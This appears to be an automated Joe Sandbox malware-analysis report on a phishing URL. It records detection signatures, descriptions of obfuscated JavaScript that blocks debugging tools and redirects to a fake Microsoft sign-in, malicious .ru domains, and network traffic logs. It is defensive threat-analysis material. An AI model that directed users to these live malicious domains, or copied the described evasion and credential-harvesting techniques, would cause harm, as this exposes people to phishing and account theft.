Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://jantaexpress.com/UyRV4rC

Overview

General Information

Sample URL:https://jantaexpress.com/UyRV4rC
Analysis ID:1595141
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 4512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=1960,i,10537831139675820418,16280064094010099974,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 4560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jantaexpress.com/UyRV4rC" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru/dtcfafzhwhbirleqzDLxHVTpKrHALYIVUMFBINZGSUUULWLEGTEAEFQVIEXDSLXWNQQCPJZUMVLDFAvira URL Cloud: Label: malware

Phishing

barindex
Source: 1.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://hbv.julfolusi.ru/CZ8MDTsC/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious login page. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of credential theft or other nefarious activities.
Source: 1.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://hbv.julfolusi.ru/CZ8MDTsC/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `turnstile.render()` function to render a form, and then the `ciGYcFftUW()` function collects user data and sends it to an untrusted domain. The script also attempts to bypass form submission and redirect the user to a Microsoft login page, which is highly suspicious behavior indicative of a phishing or malicious activity.
Source: 1.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://hbv.julfolusi.ru/CZ8MDTsC/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to execute remote code is a clear indicator of malicious intent. Additionally, the script attempts to detect and block common security tools, further suggesting a malicious purpose. Overall, this script demonstrates a high level of risk and should be treated with caution.
Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://sensoreum.com/... This script demonstrates high-risk behavior, including dynamic code execution (via the `window.onerror` event handler) and data exfiltration (redirecting the user to an external domain). The combination of these factors, along with the lack of transparency or legitimate context, indicates a high likelihood of malicious intent.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: de657777-7ba8-4d6d-8ff3-44c746f194df45429739-1f8d-4b38-9bbe-27ab273fa95b
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://jantaexpress.com/UyRV4rCHTTP Parser: No favicon
Source: https://hbv.julfolusi.ru/CZ8MDTsC/HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49896 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58433 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58453 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.6:58421 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.6:54834 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.office.com to https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3a%2f%2fwww.office.com%2fv2%2fofficehome.all&response_mode=form_post&nonce=638729758636378149.zgu2ntc3nzctn2jhoc00zdzklthmzjmtndrjnzq2zje5ngrmndu0mjk3mzktmwy4zc00yjm4ltliymutmjdhyji3m2zhotvi&ui_locales=en-us&mkt=en-us&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-jcanr7rm3er7v7o70gxn-hgalrk5uebhusmqwkv42iqiktpjhsnmmti8lfuwazvhmo0q6taf8gi2lof3vsrn_7im7pm96lfhypkiwpi3umxaopisjphyb5l6jekhwwiuf1wgwuoivsvbwt_svnojoxrhsmrggz-qlzynmgnwizgte9evxwb9liyfcamzk3eu0cixugjirfyokaqzszxbwzityhfo4likzujq5vi9jncnjoxvxv_hn8cexksrzothhjjpcymhf74zeb8gbh1a&x-client-sku=id_net8_0&x-client-ver=7.5.1.0
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /UyRV4rC HTTP/1.1Host: jantaexpress.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: jantaexpress.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
